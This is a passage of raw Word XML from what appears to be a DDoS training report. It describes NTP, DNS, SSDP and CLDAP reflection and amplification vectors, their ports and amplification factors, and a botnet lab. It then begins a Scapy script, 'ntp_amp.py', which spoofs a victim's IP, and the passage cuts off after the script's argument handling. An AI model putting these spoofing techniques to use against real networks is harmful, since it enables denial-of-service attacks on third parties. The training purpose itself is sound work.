          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.1 Advanced UDP Reflection and Amplification Vector Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26741B48" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Reflection and amplification represent a highly efficient tier of volumetric attacks. By spoofing the source IP address of the victim node and querying publicly accessible amplifier nodes running legacy or unhardened UDP protocols, an attacker can multiply inbound traffic volume exponentially. The training evaluated four core industrial amplification vectors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F475386" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>1. Network Time Protocol (NTP) Amplification: Querying the legacy '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>monlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>' command on UDP port 123. It maps up to a 556x amplification factor by extracting the last 600 client nodes connected to that time engine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5C289F" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>2. Domain Name System (DNS) Amplification: Sending spoofed 'ANY' record requests to open recursive resolvers on UDP port 53, forcing huge DNSSEC-signed responses onto the victim node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308F6003" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>3. Simple Service Discovery Protocol (SSDP): Exploiting UPnP endpoints on UDP port 1900 to force large discovery metadata responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D8C22A" w14:textId="07631D7F" w:rsidR="00010BDF" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Connectionless LDAP (CLDAP): Querying unhardened Active Directory </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>directory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> structures on UDP port 389 to force comprehensive directory blocks down to the target node.</w:t>
      </w:r>
      <w:r w:rsidR="00D4209A">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="117A3191" w14:textId="17CE0CFD" w:rsidR="00010BDF" w:rsidRDefault="00010BDF">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="1872"/>
      </w:tblGrid>
      <w:tr w:rsidR="00010BDF" w14:paraId="2A4EA47B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4A777A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="17CC4545" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Attack Protocol Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4A777A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="128A2762" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Default Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4A777A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5915A0BC" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Amplification Factor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4A777A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2DC426BD" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Primary Vulnerable Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4A777A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="590EDD5A" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Mitigation Urgency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00010BDF" w14:paraId="78A676D1" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2608D3E8" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00010BDF"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BB64139" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00010BDF"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59F10EA8" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00010BDF"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FCC32E7" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00010BDF"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27C982AA" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00010BDF"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00010BDF" w14:paraId="32DE985A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="03D5B7D9" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>NTP Amplification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="38FAC0F2" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>123 / UDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="06C8D7D6" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>50x to 556x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="620CF100" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>Public NTP Engines (monlist active)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2586790C" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>Critical Priority Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00010BDF" w14:paraId="02141A5C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="20878A1E" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>DNS Amplification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0ACA5713" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>53 / UDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0F7B33E5" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>28x to 54x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="04829051" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>Open Recursive Resolvers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1FE728C7" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>Very High Priority Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00010BDF" w14:paraId="0873B8B0" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5843FA83" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>SSDP Amplification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="42EE4B2F" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>1900 / UDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4AC72184" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>~30x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="545D9DD1" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>Internet-Exposed UPnP / IoT Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="267C451A" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>Medium-High Core Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00010BDF" w14:paraId="07C23ECD" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5A80DAED" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>CLDAP Amplification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1C5BAFA2" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>389 / UDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="046DA529" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>56x to 70x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7D65B80F" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>Exposed LDAP Directory Engines</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4253110F" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:r>
              <w:t>High Strategic Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6BBA36E0" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED"/>
    <w:p w14:paraId="0A46CD86" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED"/>
    <w:p w14:paraId="42F8979D" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1B365D"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>5. Hands-On Lab: Coordinated Botnet &amp; Volumetric Simulations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DD41B8" w14:textId="77777777" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>To simulate a distributed botnet deployment in a structured environment, multiple Kali Linux instances were choreographed as coordinated attacker bots targeting a dedicated Windows 10/11 instance running an Internet Information Services (IIS) application server on port 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C07651" w14:textId="77777777" w:rsidR="00A470E4" w:rsidRDefault="00A470E4" w:rsidP="00B71DED">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="242F07F6" w14:textId="4012151B" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Programmatic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Scapy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="4A777A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scripts for Precision Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7702FB" w14:textId="4287BC2B" w:rsidR="00B71DED" w:rsidRDefault="00B71DED" w:rsidP="00B71DED">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve">Trainees developed custom programmatic Python scripts leveraging the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>Scapy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> packet-crafting framework to forge raw IP layers, assign the target's IP to the source block, and query structural amplifier systems.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9330"/>
      </w:tblGrid>
      <w:tr w:rsidR="00010BDF" w14:paraId="1D713B2B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1B365D"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="200" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F3EF607" w14:textId="77777777" w:rsidR="00010BDF" w:rsidRDefault="00D4209A">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># ntp_amp.py - Custom Scapy Script for Layer 3/4 NTP Spoofed Reflection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>from scapy.all import *</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>import sys</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>if len(sys.argv) != 3:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    print("Usage: python ntp_amp.py &lt;victim_ip&gt; &lt;ntp_server_ip&gt;")</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    sys.exit(1)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>victim = sys.argv[1]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="282828"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:br/>
              <w:t>ntp_server = sys.argv[2]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
